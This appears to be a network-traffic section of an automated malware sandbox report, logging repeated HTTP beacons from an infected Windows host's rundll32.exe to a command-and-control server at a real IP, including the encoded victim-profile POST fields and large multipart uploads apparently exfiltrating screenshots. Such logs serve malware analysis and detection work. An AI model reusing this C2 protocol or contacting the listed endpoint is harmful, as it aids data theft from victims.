                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          303 | 176.111.174.114 | 80 | 192.168.2.4 | 49931 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:59.345542908 CEST | 10199 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:59 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          304 | 192.168.2.4 | 49932 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:59.553277016 CEST | 10199 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          305 | 176.111.174.114 | 80 | 192.168.2.4 | 49932 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:59.652452946 CEST | 10200 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:59 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          306 | 192.168.2.4 | 49933 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:59.751935959 CEST | 10213 | OUT | POST //Hnq8vS/index.php?scr=up HTTP/1.1
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          User-Agent: Uploador
                                                                                                                                          Content-Type: multipart/form-data; boundary=152138533219.jpg
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Length: 227184


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          307 | 192.168.2.4 | 49934 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:59.861910105 CEST | 10241 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          308 | 176.111.174.114 | 80 | 192.168.2.4 | 49934 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:59.962116957 CEST | 10295 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:59 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID: 309 | Source IP: 192.168.2.4 | Source Port: 49935 | Destination IP: 176.111.174.114 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp: Apr 28, 2021 23:00:00.175297022 CEST | kBytes transferred: 10430 | Direction: OUT | Data:
                                                                                                                                          POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID: 31 | Source IP: 176.111.174.114 | Source Port: 80 | Destination IP: 192.168.2.4 | Destination Port: 49763 | Process: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp: Apr 28, 2021 22:59:14.636604071 CEST | kBytes transferred: 4536 | Direction: IN | Data:
                                                                                                                                          HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:14 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID: 310 | Source IP: 176.111.174.114 | Source Port: 80 | Destination IP: 192.168.2.4 | Destination Port: 49933 | Process: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp: Apr 28, 2021 23:00:00.227772951 CEST | kBytes transferred: 10430 | Direction: IN | Data:
                                                                                                                                          HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:59 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 0
                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: text/html; charset=UTF-8


                                                                                                                                          Session ID: 311 | Source IP: 176.111.174.114 | Source Port: 80 | Destination IP: 192.168.2.4 | Destination Port: 49935 | Process: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp: Apr 28, 2021 23:00:00.273334980 CEST | kBytes transferred: 10431 | Direction: IN | Data:
                                                                                                                                          HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:00 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID: 312 | Source IP: 192.168.2.4 | Source Port: 49937 | Destination IP: 176.111.174.114 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp: Apr 28, 2021 23:00:00.487629890 CEST | kBytes transferred: 10432 | Direction: OUT | Data:
                                                                                                                                          POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID: 313 | Source IP: 176.111.174.114 | Source Port: 80 | Destination IP: 192.168.2.4 | Destination Port: 49937 | Process: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp: Apr 28, 2021 23:00:00.589323997 CEST | kBytes transferred: 10432 | Direction: IN | Data:
                                                                                                                                          HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:00 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID: 314 | Source IP: 192.168.2.4 | Source Port: 49938 | Destination IP: 176.111.174.114 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp: Apr 28, 2021 23:00:00.808923960 CEST | kBytes transferred: 10433 | Direction: OUT | Data:
                                                                                                                                          POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID: 315 | Source IP: 176.111.174.114 | Source Port: 80 | Destination IP: 192.168.2.4 | Destination Port: 49938 | Process: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp: Apr 28, 2021 23:00:00.916827917 CEST | kBytes transferred: 10433 | Direction: IN | Data:
                                                                                                                                          HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:00 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID: 316 | Source IP: 192.168.2.4 | Source Port: 49939 | Destination IP: 176.111.174.114 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp: Apr 28, 2021 23:00:01.133167028 CEST | kBytes transferred: 10434 | Direction: OUT | Data:
                                                                                                                                          POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID: 317 | Source IP: 176.111.174.114 | Source Port: 80 | Destination IP: 192.168.2.4 | Destination Port: 49939 | Process: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp: Apr 28, 2021 23:00:01.238193989 CEST | kBytes transferred: 10434 | Direction: IN | Data:
                                                                                                                                          HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:01 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID: 318 | Source IP: 192.168.2.4 | Source Port: 49940 | Destination IP: 176.111.174.114 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp: Apr 28, 2021 23:00:01.443860054 CEST | kBytes transferred: 10435 | Direction: OUT | Data:
                                                                                                                                          POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID: 319 | Source IP: 176.111.174.114 | Source Port: 80 | Destination IP: 192.168.2.4 | Destination Port: 49940 | Process: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp: Apr 28, 2021 23:00:01.547127962 CEST | kBytes transferred: 10435 | Direction: IN | Data:
                                                                                                                                          HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:01 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID: 32 | Source IP: 192.168.2.4 | Source Port: 49764 | Destination IP: 176.111.174.114 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp: Apr 28, 2021 22:59:14.955260038 CEST | kBytes transferred: 4537 | Direction: OUT | Data:
                                                                                                                                          POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID: 320 | Source IP: 192.168.2.4 | Source Port: 49942 | Destination IP: 176.111.174.114 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp: Apr 28, 2021 23:00:01.755472898 CEST | kBytes transferred: 10436 | Direction: OUT | Data:
                                                                                                                                          POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID: 321 | Source IP: 176.111.174.114 | Source Port: 80 | Destination IP: 192.168.2.4 | Destination Port: 49942 | Process: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp: Apr 28, 2021 23:00:01.861757994 CEST | kBytes transferred: 10436 | Direction: IN | Data:
                                                                                                                                          HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:01 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          322 | 192.168.2.4 | 49943 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:02.078834057 CEST | 10437 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          323 | 176.111.174.114 | 80 | 192.168.2.4 | 49943 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:02.191318989 CEST | 10437 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:02 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          324 | 192.168.2.4 | 49944 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:02.406013966 CEST | 10438 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          325 | 176.111.174.114 | 80 | 192.168.2.4 | 49944 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:02.512393951 CEST | 10438 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:02 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          326 | 192.168.2.4 | 49945 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:02.760524035 CEST | 10439 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          327 | 176.111.174.114 | 80 | 192.168.2.4 | 49945 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:02.862746000 CEST | 10439 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:02 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          328 | 192.168.2.4 | 49946 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:02.968656063 CEST | 10453 | OUT | POST //Hnq8vS/index.php?scr=up HTTP/1.1
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          User-Agent: Uploador
                                                                                                                                          Content-Type: multipart/form-data; boundary=152138533219.jpg
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Length: 227171


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          329 | 192.168.2.4 | 49947 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:03.071373940 CEST | 10480 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          33 | 176.111.174.114 | 80 | 192.168.2.4 | 49764 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:15.059020996 CEST | 4537 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:15 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          330 | 176.111.174.114 | 80 | 192.168.2.4 | 49947 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:03.168400049 CEST | 10481 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:03 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          331 | 192.168.2.4 | 49948 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:03.382013083 CEST | 10668 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
